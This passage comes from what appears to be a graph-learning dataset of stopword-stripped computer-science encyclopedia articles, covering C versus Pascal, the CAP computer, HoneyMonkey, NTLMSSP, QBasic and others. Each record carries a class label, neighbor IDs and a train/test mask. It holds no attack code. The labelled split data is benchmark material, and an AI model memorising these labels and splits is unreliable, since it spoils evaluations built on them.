c. c pascal use keywords words reserved use language examples const goto keywords happen common languages c basic built-in type names also keywords e.g int char combinations keywords e.g unsigned char pascal built-in type names predefined normal identifiers pascal procedure definitions start keywords procedure function type definitions type c function definitions determined syntactical context type definitions use keyword codice_4 languages use mix keywords punctuation definitions complex types instance arrays defined keyword array pascal punctuation c enumerations defined keyword codice_21 c punctuation pascal pascal functions begin end delimit block statements proper c functions use delimit block statements optionally preceded declarations c c99 strictly defines declarations must occur statements within particular block allows blocks appear within blocks way go around pascal strict declarations must occur statements allows definitions types functions variable declarations encapsulated function definitions level depth grammars languages similar size implementation perspective main difference two languages parse c necessary access symbol table types pascal one construct assignment instance c fragment codice_22 could declaration codice_23 object whose type pointer codice_24 statement-expression multiplies codice_24 codice_23 contrast corresponding pascal fragment codice_27 inherently unambiguous correct parsing require symbol table pascal requires variable function declarations specify type explicitly traditional c type name may omitted contexts default type codice_28 corresponds codice_29 pascal implicitly assumed however defaults considered bad practice c often flagged warnings c accommodates different sizes signed unsigned modes integers using modifiers codice_30 codice_31 codice_32 codice_33 etc exact meaning resulting integer type machine-dependent however guaranteed codice_34 least 16 bits codice_35 shorter codice_28 codice_37 longer codice_28 pascal similar end performed declaring subrange integer compiler may choose allocate smaller amount storage declared variable type 1..100 subrange feature supported c. major subtle difference c pascal promote integer operations pascal result operation defined integer/subrange types even intermediate results fit integer result undefined fit integer/subrange left hand side assignment may imply artificial restriction range integer types may require slow execution handle intermediate results however compiler may take advantage restricted subranges produce efficient code c operands must first promoted size required result intermediate results undefined fit range promoted operands range required result greater range operands normally produces slow inefficient code even good optimising compiler however c compiler never required expected handle range intermediate results programmers responsibility ensure intermediate results fit operand range pre-standard implementation c well small-c et al allowed integer pointer types relatively freely intermixed c character type codice_39 kind integer longer codice_37 expressions codice_41 therefore perfectly legal declarations codice_42 codice_43 integer nature codice_39 one byte clearly illustrated declarations unsigned char uc 255 /* common limit */ signed char sc -128 /* common negative limit */ whether codice_39 type regarded codice_32 codice_33 default implementation pascal characters integers distinct types inbuilt compiler functions codice_48 codice_49 used typecast single characters corresponding integer value character set use vice versa e.g systems using ascii character set codice_50 codice_51 tab character pascal boolean enumerated type possible values boolean false true conversion integer ord used ord b standard function integer boolean however conversion simple practice b 0 c binary valued relational operators == may regarded boolean sense always give results either zero one tests || etc performed zero-checks false represented zero true represented value c allows using bitwise operators perform boolean operations care must taken semantics different operands make use one bit represent value pascal another abstract high level method dealing bitwise data sets sets allow programmer set clear intersect unite bitwise data values rather using direct bitwise operators available modern pascal well example pascal status status stickyflag status status stickyflag stickyflag status ... pascal status status stickyflag status status stickyflag stickyflag status stickyflag ... c status |= stickyflag status ~stickyflag status stickyflag ... although bit operations integers operations sets considered similar sets implemented using bits direct parallel uses unless non-standard conversion integers sets possible expression evaluation languages boolean value may internally stored single bit single byte full machine word position generated code condition code status register depending machine compiler situation factors usually important language compiled c less strict model floating point types pascal c integers may implicitly converted floating point numbers vice versa though possible precision loss may flagged warnings pascal integers may implicitly converted codice_52 conversion codice_52 codice_29 information may lost must done explicitly via functions codice_55 codice_56 truncate round fraction respectively c pascal include enumeration types pascal example type var c example enum color red green blue enum color behavior types two languages however different c codice_57 becomes synonym 0 codice_58 1 codice_59 2 nothing prevents value outside range assigned variable codice_60 furthermore operations like codice_61 strictly forbidden pascal instead would use codice_62 c enums freely converted ints pascal function ord must used convert enumerated types integers function convert integer enumerated types c pascal allow arrays complex types including arrays however similarity languages ends c arrays simply defined base type number elements int size always indexed 0 size-1 i.e modulo size pascal range indices often specified subrange introduced simple types ten elements var array 0..9 integer would indexed 0..9 c case array indices ordinal data type however ranges type var picture array 1..640 1..480 rgb var palette array byte 0..2 byte strings consisting n 1 characters defined packed arrays range 1..n. c expressions identifier representing array treated constant pointer first element array thus given declarations codice_63 codice_64 assignment codice_65 valid causes p point array identifier codice_60 represents constant address codice_67 valid however arrays c fixed pointers interchangeable flexibility allows c manipulate length array using code also leaves programmer responsibility write outside allocated array checks built language pascal arrays distinct type pointers makes bounds checking arrays possible compiler perspective practically pascal compilers support range checking compile option ability arrays change length runtime able check language control often termed dynamic arrays pascal number elements array type determined compile-time changed execution program hence possible define array whose length depends way program data c ability initialize arrays arbitrary length codice_68 operator used obtain size statically initialized array c code instance following code terminating index loop automatically adjusts list strings changed static char *wordlist static int listsize sizeof wordlist /sizeof wordlist 0 int i=0 listsize i++ i=listsize-1 =0 -- pascal neither array initialization outside case strings means determining arbitrary array sizes compile time one way implementing example pascal without automatic size adjustment const type var procedure createlist var w wordlist begin end begin end languages string primitive array characters pascal string literal length n compatible type codice_69 c string generally type codice_70 pascal support variable-length arrays set routines perform string operations dependent particular string size standardized pascal conformant array parameter extension solves great extent many even implementations pascal support strings native language c string literals null-terminated say trailing null character end-of-string sentinel const char *p p rain spain /* null-terminated */ null-termination must manually maintained string variables stored arrays often partly handled library routines c built-in string array assignment string actually transferred p rather p made point constant string memory pascal unlike c string first character element index 1 0 leading length-prefixed pascal stores length string 0th element character array difference well understood lead errors porting trying interface object code generated languages freebsd developer poul-henning kamp writing acm queue would later refer victory null-terminated strings length-prefixed strings expensive one-byte mistake ever c pascal declare record types c termed structures struct type record end pascal use sentence name_of_record order use directly fields record like local variables instead write name_of_record name_of_field example type var r1 r begin r1 begin end equivalent feature c. c exact bit length field specified struct much storage actually used depends traits e.g word-alignment target system feature available pascal using subrange construct 3 bits gives range 0 7 association keyword packed type packed record end c pascal support records include different fields overlapping union type record end language processors free allocate much space records needed contain largest type union/record biggest difference c pascal pascal supports explicit use tagfield language processor determine valid component variant record accessed type record end case tagfield q must set right state access proper parts record c pointers made point program entities including objects functions int int *b int *compare int c int int mycompare int c int b compare mycompare c since arrays pointers close equivalence following b 5 b+5 5+b 5 b thus pointers often used c another method access arrays create dynamic data library functions codice_71 codice_72 used obtain release dynamic blocks data thus dynamic memory allocation built language processor especially valuable c used operating system kernels embedded targets things platform architecture specific would require changing c compiler platform operating system would used pascal n't kind pointers c indirection operator covers common use c pointers pointer bound single dynamic data item moved assignment type ^integer var b c new b c b pointers pascal type safe i.e pointer one data type assigned pointer data type also pointers never assigned non-pointer variables pointer arithmetic common source programming errors c especially combined endianness issues platform-independent type sizes permitted pascal restrictions reduce possibility pointer-related errors pascal compared c prevent invalid pointer references pascal altogether example runtime error occur pointer referenced initialized disposed languages differ significantly comes expression evaluation all-in-all comparable pascal c operators serve several purposes pascal instance minus sign may used negation subtraction set difference depending type syntactical context codice_92 operator may used compare numbers strings sets c uses dedicated operator symbols greater extent two languages use different operators assignment pascal like algol uses mathematical equality operator codice_93 equality test symbol codice_94 assignment whereas c like b uses mathematical equality operator assignment c b new codice_95 symbol therefore introduced equality test common mistake c due either inexperience simple typing error accidentally put assignment expressions conditional statements codice_96 code braces always execute assignment expression codice_97 value 10 non-zero therefore considered true c part c algol allow multiple assignment form codice_98 supported pascal also note codice_60 value codice_100 may affect following code recent c compilers try detect cases warn user asking less ambiguous syntax like codice_101 kind mistake happen pascal assignments expressions value using wrong operator cause unambiguous compilation error also less likely anyone would mistake codice_94 symbol equality test notable algol conditional expression form codice_103 equivalent c pascal niklaus wirth designed pascal desire limit number levels precedence fewer parse routines exclusive operators treated like addop processed level math expression similarly treated like mulop processed term precedence levels notice one set syntax rules applying kinds operators according grammar expressions like perfectly legal fact far parser concerned pascal n't allow mixing arithmetic boolean variables things like caught semantic level comes time generate code rather syntax level authors c took diametrically opposite approach treat operators different fact c fewer 15 levels c also operators '= '+= kin « » '++ -- etc although c arithmetic boolean operators treated separately variables boolean test made integer value pascal boolean expression relies particular evaluation ordering possibly via side-effects function calls less regarded error pascal compiler freedom use whatever ordering may prefer must always evaluate whole expression even result determined partial evaluation c dependence boolean evaluation order perfectly legal often systematically employed using codice_8 codice_9 operators together operators codice_106 codice_107 comma operator etc codice_8 codice_9 operators thereby function combinations logical operators conditional statements short circuit expression evaluation commonly considered advantage c evaluation problem var integer seemingly straightforward search problematic pascal array access would invalid equal 11 however superscalar processors penalty jumps cause pipeline stalls programs created efficient jumps removed possible pascal ability evaluate using fixed formula without jumps advantage highly optimizing compilers whereas c effectively prevented requiring short circuit optimization statements building control structures roughly analogous relatively similar least first three pascal c pascal original form equivalent default equivalent else clause common extension pascal programmers otherwise guard case-statements expression c so-called early-out statements break continue pascals well c pascal goto statement however since pascal nested procedures/functions jumps done inner procedure function containing one commonly used implement error recovery c ability via ansi c setjmp longjmp equivalent arguably less safe since stores program specific information like jump addresses stack frames programmer accessible structure pascal routines return value called functions routines n't return value called procedures routines c called functions c functions return value declared return type void pascal procedures considered equivalent c void functions pascal functions equivalent c functions return value following two declarations c int f int x int void k int q equivalent following declarations pascal function f x integer integer procedure k q integer pascal two different types parameters pass-by-value pass-by-reference var function f var k integer integer x f c parameters passed value pass-by-reference simulated using pointers following segment similar pascal segment int f int *k //function accepts pointer parameter x f c allows functions accept variable number parameters known variadic functions int f int ... f 1 2 3 4 5 function codice_110 uses special set functions allow access parameters turn additionally pascal i/o statements built language handle variable amount parameters like codice_111 pascal allows procedures functions nested convenient allow variables local group procedures global c feature localization variables functions could done compilation module wherein variables functions would declared static c allows functions indirectly invoked function pointer following example statement codice_112 equivalent codice_113 int *cmpar const char *a const char *b const char *s1 hello const char *s2 world cmpar strcmp b *cmpar s1 s2 pascal also allows functions procedures passed parameters functions procedures procedure showhex integer end procedure showint integer end procedure demo procedure show integer var j integer begin end early c neither constant declarations type declarations c language originally defined needing preprocessor separate program pass handled constant include macro definitions keep memory usage later ansi c obtained constant type definitions features preprocessor also became part language leading syntax see today pascal constant type defines built programmers using preprocessor also pascal sometimes one used c certainly common c. although often pointed lack pascal technically c n't program modularity macros built either simple low level separate compilation facility however traditionally using generic linker used assembly language pascal c programmer may inspect byte-level representation object pointing codice_39 pointer int char *p char char c *p // first byte may possible something similar pascal using undiscriminated variant record var integer begin end although casting possible pascal compilers interpreters even code a2c.a a2c.b n't required pascal standardizations share address space niklaus wirth designer pascal written problematic nature attempting type escapes using approach implementors pascal decided checking would expensive enlarging code deteriorating program efficiency consequence variant record became favourite feature breach type system programmers love tricks usually turn pitfalls calamities several languages specifically exclude type escapes example java c wirth oberon c files exist built-in type defined system header i/o takes place via library calls pascal file handling built language typical statements used perform i/o language printf sum d\\n x writeln 'the sum x main difference c uses format string interpreted find arguments printf function convert whereas pascal performs control language processor pascal method arguably faster interpretation takes place c method highly extensible popular pascal implementations incorporated virtually c constructs pascal examples include type casts able obtain address variable local global different types integers special promotion properties however incorporation c lenient attitude towards types type conversions result pascal loses type security example java c created part address perceived type security issues c managed pointers used create invalid references original form described niklaus wirth pascal qualifies managed pointer language 30 years either java c however pascal amalgamated c would lose protection definition general lower dependence pointers basic tasks makes safer c practice extended pascal standard extends pascal support many things c supports original standard pascal type safer manner example schema types support besides uses variable-length arrays keeping type-safety mandatory carrying array dimension array allowing automatic run-time checks out-of-range indices also dynamically sized arrays",
    "neighbors": [
      512,
      1145,
      5896,
      1931,
      6414,
      9871,
      6160,
      5521,
      8082,
      10510,
      11411,
      5399,
      3736,
      1435,
      155,
      6558,
      5663,
      10143,
      5796,
      428,
      2605,
      5165,
      5677,
      5806,
      9008,
      3765,
      10043,
      10684,
      8510,
      6338,
      963,
      1349,
      8262,
      5961,
      1610,
      1611,
      8524,
      4173,
      8397,
      9804,
      11212,
      11219,
      5588,
      7894,
      4057,
      9306,
      10586,
      7775,
      8545,
      4069,
      8037,
      10470,
      7274,
      6640,
      4341,
      1016,
      3577,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 7480,
    "label": 3,
    "text": "CAP_computer:cap computer cambridge cap computer first successful experimental computer demonstrated use security capabilities hardware software developed university cambridge computer laboratory 1970s unlike research machines time also useful service machine sign currently front machine reads cap project memory protection ran 1970 1977 based capabilities implemented hardware m. wilkes r. needham d. wheeler responsible implementation r. needham awarded bcs technical award 1978 cap capability protection project cap designed access memory segment hardware required current process held necessary capabilities 32-bit processor featured microprogramming control two 256-entry caches 32-entry write buffer capability unit 64 registers holding evaluated capabilities floating point operations available using single 72-bit accumulator instruction set featured 200 instructions including basic alu memory operations capability- process-control instructions instead programmer-visible registers used chicago plessey system 250 designs cap would load internal registers silently program defined capability memory divided segments 64k 32-bit words segment could contain data capabilities hardware accessed via associated minicomputer procedures constituting operating system written algol 68c although number closely associated protected procedures paginator written bcpl cap first became operational 1976 fully functional computer featured complete operating system file system compilers os used process tree structure initial process called master coordinator removed need separate modes operation process could directly access resources children practice two levels ever used cap operation",
    "neighbors": [
      256,
      2179,
      2951,
      6675,
      6813,
      3999,
      1952,
      9762,
      10146,
      7983,
      10813,
      4034,
      1349,
      4423,
      1611,
      7884,
      11596,
      10835,
      728,
      5853,
      5483,
      10734,
      3700,
      2422,
      10614,
      5503
    ],
    "mask": "None"
  },
  {
    "node_id": 7481,
    "label": 2,
    "text": "Opaque_binary_blob:opaque binary blob opaque binary blob obb term used network engineering computer science refer sizeable piece data looks like binary garbage outside entities know blob denotes carries make sense entities access permission access functions also pejorative term compiled code without source code made available see binary blob least one network protocol advanced message queuing protocol uses terminology obb android operating systems starting version 2.3 code named gingerbread use obbs refer one blob multiple files maybe even file system whole file system one file obbs available storage manager interface android done means abstraction multiple applications running operating system easily access obb example map database map obb multiple applications running android 2.3 access maps eliminates need maintain different map data different applications similar functions features many hd games android platform use obb files allow storage large files device external sd card tuxedo middleware also uses obbs mention c c++ arrays typed data buffers probably input needed experts oldest reference obbs used computer system vendor distributes software object binary form without mention inner workings code called 'proprietary obb 'proprietary blob binary blob practice protect company intellectual property probably keep competitive edge see proprietary software also prevents hackers improving system subverting example nvidia tegra 'proprietary obb",
    "neighbors": [
      1952,
      2635,
      2045,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 7482,
    "label": 4,
    "text": "HoneyMonkey:honeymonkey honeymonkey short strider honeymonkey exploit detection system microsoft research honeypot implementation uses network computers crawl world wide web searching websites use browser exploits install malware honeymonkey computer snapshot memory executables registry honeypot computer recorded crawling site visiting site state memory executables registry recorded compared previous snapshot changes analyzed determine visited site installed malware onto client honeypot computer honeymonkey based honeypot concept difference actively seeks websites try exploit term coined microsoft research 2005 honeymonkeys possible find open security holes yet publicly known exploited attackers single honeymonkey automated program tries mimic action user surfing net series honeymonkeys run virtual machines running windows xp various levels patching — fully patched fully vulnerable others two extremes honeymonkey program records every read write file system registry thus keeping log data collected web-site software installed program leaves site log analyzed determine malware loaded cases log actions sent manual analysis external controller program logs exploit data restarts virtual machine allow crawl sites starting known uninfected state 10 billion plus web pages many legitimate sites use exploit browser vulnerabilities start crawling sites would waste resources initial list therefore manually created listed sites known use browser vulnerabilities compromise visiting systems malware honeymonkey system follows links exploit sites higher probability leading exploit sites honeymonkey system also records many links point exploit site thereby giving statistical indication easily exploit site reached honeymonkey uses black box system detect exploits i.e. use signature browser exploits detect exploits monkey program single instance honeymonkey project launches internet explorer visit site also records registry file read write operations monkey allow pop-ups allow installation software read write happens internet explorer temporary folder therefore must used browser exploits analyzed malware detection programs manually analyzed monkey program restarts virtual machine crawl another site fresh state",
    "neighbors": [
      4503,
      5920,
      5956,
      9256,
      7983,
      113,
      3922,
      2358,
      119,
      6938,
      7515,
      2140
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7483,
    "label": 3,
    "text": "Monolithic_kernel:monolithic kernel monolithic kernel operating system architecture entire operating system working kernel space monolithic model differs operating system architectures microkernel architecture alone defines high-level virtual interface computer hardware set primitives system calls implement operating system services process management concurrency memory management device drivers added kernel modules modular operating systems os-9 modern monolithic operating systems openvms linux bsd sunos aix multics dynamically load unload executable modules runtime modularity operating system binary image level architecture level modular monolithic operating systems confused architectural level modularity inherent server-client operating systems derivatives sometimes marketed hybrid kernel use microkernels servers mistaken modules daemons practically speaking dynamically loading modules simply flexible way handling operating system image runtime—as opposed rebooting different operating system image modules allow easy extension operating systems capabilities required dynamically loadable modules incur small overhead compared building module operating system image however cases loading modules dynamically as-needed helps keep amount code running kernel space minimum example minimize operating system footprint embedded devices limited hardware resources namely unloaded module need stored scarce random access memory",
    "neighbors": [
      6148,
      6155,
      6158,
      2064,
      4113,
      8209,
      25,
      10273,
      6180,
      4151,
      8248,
      4153,
      59,
      69,
      6221,
      89,
      10333,
      4192,
      97,
      8298,
      2168,
      2178,
      2179,
      10382,
      6296,
      2201,
      10394,
      6301,
      178,
      4279,
      6329,
      6333,
      8388,
      10436,
      2248,
      4308,
      6361,
      8410,
      6377,
      242,
      6393,
      8441,
      4355,
      10499,
      273,
      2321,
      292,
      6436,
      2345,
      6445,
      2355,
      4409,
      6459,
      10564,
      2375,
      4423,
      2380,
      6491,
      10590,
      8551,
      6508,
      2424,
      376,
      8573,
      394,
      4492,
      4493,
      2462,
      421,
      4521,
      2477,
      4525,
      10676,
      439,
      485,
      10730,
      10731,
      10732,
      8687,
      495,
      2560,
      8713,
      6675,
      8725,
      10776,
      4637,
      543,
      4643,
      551,
      561,
      10803,
      10809,
      10813,
      8767,
      576,
      2625,
      4673,
      8774,
      2637,
      10851,
      6760,
      10856,
      10860,
      2671,
      6772,
      4727,
      634,
      639,
      6787,
      2692,
      8837,
      10883,
      10891,
      6797,
      2704,
      8857,
      671,
      673,
      10920,
      8879,
      6837,
      4790,
      8889,
      8902,
      2763,
      8907,
      6898,
      2811,
      8957,
      11013,
      8977,
      787,
      789,
      6934,
      4887,
      2853,
      11045,
      823,
      11075,
      6988,
      2914,
      9064,
      9066,
      7020,
      7027,
      2933,
      7039,
      7057,
      926,
      5022,
      9119,
      11171,
      935,
      11184,
      2995,
      948,
      9141,
      9151,
      11204,
      11205,
      9166,
      975,
      981,
      3042,
      5093,
      3049,
      9194,
      5105,
      3058,
      5109,
      5110,
      5115,
      11262,
      11263,
      3079,
      3089,
      7187,
      3097,
      11294,
      11297,
      7204,
      9253,
      5158,
      11305,
      7217,
      1080,
      3129,
      5177,
      9276,
      5190,
      3147,
      7249,
      1107,
      3160,
      3162,
      9308,
      11363,
      3178,
      7285,
      9335,
      1147,
      11388,
      3197,
      1150,
      5247,
      9342,
      11390,
      9353,
      11410,
      9366,
      9370,
      7325,
      5279,
      3241,
      3245,
      3248,
      7382,
      7385,
      11481,
      9436,
      1247,
      5343,
      11489,
      1253,
      1255,
      7403,
      9452,
      11501,
      5363,
      9466,
      9468,
      1278,
      7435,
      11539,
      5397,
      1304,
      9507,
      7477,
      5452,
      5457,
      11601,
      7507,
      11603,
      7511,
      5467,
      3426,
      5484,
      7534,
      11635,
      5492,
      7561,
      11667,
      11675,
      3487,
      1442,
      1445,
      3496,
      11689,
      9643,
      1455,
      7601,
      3542,
      9689,
      9693,
      1508,
      5619,
      1524,
      7689,
      3600,
      9762,
      1574,
      9784,
      3654,
      9807,
      5721,
      3684,
      3685,
      9835,
      5742,
      7814,
      3722,
      9882,
      9887,
      3745,
      7845,
      9899,
      7854,
      9907,
      5823,
      1736,
      9932,
      5840,
      3815,
      7913,
      7920,
      1804,
      3857,
      3865,
      10016,
      7983,
      1846,
      7999,
      10052,
      5959,
      10062,
      8033,
      3940,
      8063,
      10113,
      8069,
      3978,
      10127,
      10138,
      8092,
      6049,
      10149,
      6055,
      6056,
      8106,
      10156,
      6075,
      8124,
      6078,
      4040,
      8136,
      6100,
      10215,
      4073,
      6128,
      8177,
      8180,
      10235,
      8191
    ],
    "mask": "Test"
  },
  {
    "node_id": 7484,
    "label": 2,
    "text": "NTLMSSP:ntlmssp ntlmssp nt lan manager ntlm security support provider binary messaging protocol used microsoft security support provider interface sspi facilitate ntlm challenge-response authentication negotiate integrity confidentiality options ntlmssp used wherever sspi authentication used including server message block cifs extended security authentication http negotiate authentication e.g iis iwa turned msrpc services ntlmssp ntlm challenge-response protocol documented microsoft open protocol specification",
    "neighbors": [
      2083,
      5225,
      4435,
      4439,
      9114
    ],
    "mask": "Test"
  },
  {
    "node_id": 7485,
    "label": 1,
    "text": "Apache_OpenJPA:apache openjpa openjpa open source implementation java persistence api specification object-relational mapping orm solution java language simplifies storing objects databases open-source software distributed apache license 2.0 kodo java data objects implementation originally developed solarmetric inc 2001 bea systems acquired solarmetric 2005 kodo expanded implementation jdo jsr 12 jpa jsr 220 specifications 2006 bea donated large part kodo source code apache software foundation name openjpa donated source code core persistence engine bea weblogic server ibm websphere geronimo application server may 2007 openjpa graduated incubator top-level project also passed sun technology compatibility kit compliant java persistence api",
    "neighbors": [
      3080,
      6161,
      1047,
      8217,
      11303,
      5677,
      9789,
      7742,
      7233,
      7750,
      7261,
      8799,
      2658,
      8294,
      8810,
      2163,
      6774,
      3705,
      8825,
      3710,
      10377,
      8860,
      6338,
      1222,
      4294,
      6860,
      8408,
      8425,
      747,
      5872,
      9467,
      4358,
      8460,
      1296,
      10526,
      3877,
      1327,
      7983,
      7475,
      4919,
      1851,
      4419,
      10573,
      3920,
      4944,
      1363,
      4960,
      865,
      5987,
      11111,
      9078,
      1913,
      910,
      7567,
      11161,
      6555,
      10661,
      5031,
      5047,
      4538,
      6074,
      10683,
      5567,
      9665,
      1991,
      5066,
      8139,
      10193,
      9179,
      990,
      10719,
      11235,
      3560,
      3561,
      3562,
      5612,
      7159,
      1018,
      6143
    ],
    "mask": "None"
  },
  {
    "node_id": 7486,
    "label": 9,
    "text": "QBasic:qbasic qbasic short form quick beginners purpose symbolic instruction code integrated development environment interpreter variety basic programming languages based quickbasic code entered ide integrated development environment compiled intermediate representation ir ir immediately interpreted demand within ide run nearly versions dos 32-bit versions windows emulation via dosbox/dosemu linux freebsd 64-bit versions windows qbasic dos program requires dos dos emulator windows xp comes emulator called dos virtual machine subsequent versions windows require emulator dosbox time qbasic provided state-of-the-art ide including debugger features on-the-fly expression evaluation code modification supports various inbuilt functions like quickbasic unlike earlier versions microsoft basic qbasic structured programming language supporting constructs subroutines line numbers concept often associated basic supported compatibility considered good form replaced descriptive line labels qbasic limited support user-defined data types structures several primitive types used contain strings text numeric data qbasic intended replacement gw-basic based earlier quickbasic 4.5 compiler without quickbasic compiler linker elements version 1.0 shipped together ms-dos 5.0 higher well windows 95 windows nt 3.x windows nt 4.0 ibm recompiled qbasic included pc dos 5.x well os/2 2.0 onwards ecomstation descended os/2 code includes qbasic 1.0 qbasic 1.1 included ms-dos 6.x without codice_1 windows 95 windows 98 windows starting windows 2000 microsoft longer includes qbasic operating systems still obtained use newer versions windows qbasic well built-in ms-dos editor backwards-compatible dos releases prior 5.0 least dos 3.20 however used 8088/8086 computers 80286 computers qbasic program may run slowly perhaps due dos memory size limits ms-dos 7 ms-dos editor help required qbasic codice_2 codice_3 programs simply started qbasic editor help mode also entered running codice_4 codice_5 codice_6 switches i.e. command lines codice_7 codice_8 qbasic came complete four pre-written example programs nibbles variant snake game gorillas artillery game money manager personal finance manager remline q-basic code line-number-removing program qbasic easter egg see press hold screenprint seen easter egg archive qbasic page",
    "neighbors": [
      6148,
      2568,
      6154,
      7691,
      6674,
      22,
      8729,
      8227,
      4136,
      11315,
      6709,
      4160,
      4674,
      4174,
      9808,
      83,
      92,
      608,
      5733,
      8301,
      1647,
      5747,
      6778,
      639,
      9345,
      3718,
      6281,
      6797,
      10387,
      10900,
      11412,
      10902,
      11414,
      3224,
      3736,
      4248,
      9881,
      3233,
      7847,
      7343,
      3250,
      9907,
      7355,
      7356,
      10428,
      7870,
      6338,
      712,
      1741,
      1750,
      9946,
      3303,
      8429,
      10478,
      759,
      3323,
      6396,
      6910,
      1805,
      9997,
      3856,
      786,
      5395,
      11030,
      5401,
      797,
      5925,
      11559,
      808,
      8494,
      303,
      7983,
      10033,
      11570,
      823,
      315,
      5437,
      8517,
      847,
      1366,
      1879,
      2401,
      2915,
      6506,
      2943,
      3970,
      10631,
      7064,
      3481,
      2462,
      4001,
      11683,
      8101,
      3496,
      4010,
      10666,
      10157,
      7088,
      960,
      9166,
      10703,
      4057,
      11229,
      9188,
      10727,
      11243,
      2541,
      2545,
      11249,
      8692,
      9205,
      2045,
      10750,
      1535
    ],
    "mask": "Test"
  },
  {
    "node_id": 7487,
    "label": 9,
    "text": "The_Computer_Language_Benchmarks_Game:computer language benchmarks game computer language benchmarks game formerly called great computer language shootout free software project comparing given subset simple algorithms implemented various popular programming languages project consists due resource constraints small subset common programming languages supported discretion game operator following aspects given implementation measured common see multiple solutions programming language problem highlights within bounds given language solution given either high abstraction memory efficiency fast parallelizes better design choice start include simple toy problems providing different kind programming challenge provides users benchmark game opportunity scrutinize various implementations project known great computer language shootout 2007 port windows maintained separately 2002 2003 sources archived gitlab also older forks github project continuously evolving list supported programming languages updated approximately per annum following market trends users also submit improved solutions problems suggest testing methodology refinement developers highlight fact research exercise caution using microbenchmarks benchmark results uncovered various compiler issues sometimes given compiler failed process unusual otherwise grammatically valid constructs times runtime performance shown expectations prompted compiler developers revise optimization capabilities various research articles based benchmarks results methodology",
    "neighbors": [
      3876,
      8582,
      2062,
      4561,
      11219,
      5365,
      11221,
      5567
    ],
    "mask": "Test"
  },
  {
    "node_id": 7488,
    "label": 8,
    "text": "The_Old_Reader:old reader old reader web-based news aggregator delivers website blog internet content web-based inbox service sprung google removed social features google reader site supports social media sharing including ability like content find friends via social media networks old reader started hobby project elena bulygina dmitry krasnoukhov anton tolchanov march 2013 10,000 users started gaining popularity quickly google announced would retire google reader end april 2013 project already 200,000 users anton quit leaving elena dmitry august 2013 month google reader shut two remaining co-founders struggling keep website running face large influx new users july 29 old reader team stated 420,000 registered users many 60,000 registrations single day team announced intention close public version reader leaving private website limited number people however days later another announcement stated website remain public support unnamed corporate entity united states november 2013 team mentioned new owner levee labs new team invested hardware upgrade changed hosting provider implemented number new features including long-awaited browser bookmarklet founders site publicly rejected ad-based tactics support service new team shares vision order finance operations otherwise free application introduced premium service february 2014 old reader free 100 feeds offers premium version full-text search 500 subscriptions 6 months post storage former users google reader rss readers import feeds via opml export browser bookmarklet lets users send web pages directly old reader account service integrated facebook google help users find friends also using site also support readability instapaper spritz service help read content faster old reader made mobile api freely available facilitate support mobile applications service supported number mobile applications major platforms including reeder feeddler ios greader android longer available 2018 old reader windows phone thor symbian old reader reception generally positive pc magazine praised simple design social aspects noted lacked features competitors.dave winer one creators rss technology pundits praised old reader team commitment open web standards delivering ad-free services although 17 march 2015 service includes sponsored posts inline aggregated content",
    "neighbors": [
      1664,
      3971,
      8584,
      4490,
      11274,
      10126,
      3350,
      11418,
      11674,
      2076,
      10270,
      1834,
      4013,
      559,
      9908,
      10057,
      5205,
      4310,
      5078,
      6231,
      6237,
      735,
      10722,
      3428,
      5605,
      8169,
      9451,
      8557,
      9325,
      7921,
      119,
      11000,
      5114
    ],
    "mask": "None"
  },
  {
    "node_id": 7489,
    "label": 7,
    "text": "FinancialForce.com:financialforce.com financialforce cloud-based applications company headquartered san francisco california provides cloud erp solution force.com cloud computing platform salesforce.com financialforce supplies accounting billing professional services automation psa revenue recognition human capital management hcm supply chain management scm applications financialforce founded jeremy roche 2009 investment unit4 salesforce.com resulting cloud accounting system single-ledger design enables real-time financial management built salesforce.com technology platform force.com company started specializing accounting billing solutions built force.com platform therefore making closely coupled salesforce crm applications december 2010 financialforce purchased appirio professional services enterprise pse product later renamed financialforce professional services automation november 2013 financialforce annual customer day company announced acquisitions supply chain management vendor less software human capital management vendor vana workforce intention round back office applications portfolio february 2014 company unveils financialforce erp built salesforce platform financialforce erp connects customers employees partners products single system april 2014 financialforce received 50 million funding advent international march 2015 company receives 110 million funding technology crossover ventures salesforce ventures january 2017 financialforce appointed former salesforce heroku executive tod nielsen ceo president financialforce headquartered san francisco california emea headquarters harrogate england sydney australia covers apac region offices located chicago il manchester nh granada spain portland burlington ontario financialforce supports mobile usage financialforce mobile along force.com mobile application platform supporting iphone ipad well blackberry android november 2013 company introduced financialforce 360° back office mobile app salesforce1 app exchange community live annual conference customers media business strategy product announcements thinkstrategies inc. leading strategic consulting company focused business implications on-demand services market awarded financialforce.com best saas showplace boss award financialforce named 2011 red herring magazine top 100 north america group 100 companies judged publication innovative across north america company since listed 2011 red herring global top 100 identifies 100 innovative companies worldwide financialforce accounting product financialforce accounting named software product year 2013 business finance awards business finance awards 2013 designed recognise excellence business finance alwayson networks named financialforce.com 2013 ondemand 100 winner financialforce.com selected alwayson editorial team industry experts spanning globe based set five criteria innovation market potential commercialization stakeholder value media buzz financialforce ceo jeremy roche chosen forbes best cloud computing companies ceos work 2014 led chro charles ashworth financialforce named eighth annual glassdoor employees ’ choice award best places work 2016 u.s. smb category",
    "neighbors": [
      2208,
      1539,
      9732,
      5224,
      11113,
      10090,
      6539,
      1612,
      4621,
      7532,
      10509,
      1008,
      1680
    ],
    "mask": "None"
  },
  {
    "node_id": 7490,
    "label": 5,
    "text": "Frequency-division_multiplexing:frequency-division multiplexing telecommunications frequency-division multiplexing fdm technique total bandwidth available communication medium divided series non-overlapping frequency bands used carry separate signal allows single transmission medium cable optical fiber shared multiple independent signals another use carry separate serial bits segments higher rate signal parallel natural example frequency-division multiplexing radio television broadcasting multiple radio signals different frequencies pass air time another example cable television many television channels carried simultaneously single cable fdm also used telephone systems transmit multiple telephone calls high capacity trunklines communications satellites transmit multiple channels data uplink downlink radio beams broadband dsl modems transmit large amounts computer data twisted pair telephone lines among many uses analogous technique called wavelength division multiplexing used fiber-optic communication multiple channels data transmitted single optical fiber using different wavelengths frequencies light multiple separate information modulation signals sent fdm system video signals television channels sent cable tv system called baseband signals source end frequency channel electronic oscillator generates carrier signal steady oscillating waveform single frequency serves carry information carrier much higher frequency baseband signal carrier signal baseband signal combined modulator circuit modulator alters aspect carrier signal amplitude frequency phase baseband signal piggybacking data onto carrier result modulating mixing carrier baseband signal generate sub-frequencies near carrier frequency sum f f difference f − f frequencies information modulated signal carried sidebands side carrier frequency therefore information carried channel narrow band frequencies clustered around carrier frequency called 